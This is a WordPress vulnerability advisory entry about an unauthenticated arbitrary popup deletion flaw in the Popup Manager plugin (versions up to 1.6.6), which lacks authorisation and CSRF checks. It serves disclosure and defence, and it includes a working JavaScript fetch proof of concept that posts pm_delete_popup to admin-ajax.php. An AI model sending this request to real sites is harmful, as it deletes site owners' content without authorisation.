Lucene search

K
wpexploitLana CodesWPEX-ID:60786BF8-C0D7-4D80-B189-866ABA79BCE2
HistoryNov 28, 2022 - 12:00 a.m.

Popup Manager <= 1.6.6 - Unauthenticated Arbitrary Popup Deletion

2022-11-2800:00:00
Lana Codes
123
popup manager
unauthenticated
arbitrary
deletion
csrf
exploit

0.001 Low

EPSS

Percentile

47.3%

The plugin does not have authorisation and CSRF checks when deleting popups, which could allow unauthenticated users to delete them

As an unauthenticated users, or via CSRF:

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=pm_delete_popup&popup_id=2',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

0.001 Low

EPSS

Percentile

47.3%

Related for WPEX-ID:60786BF8-C0D7-4D80-B189-866ABA79BCE2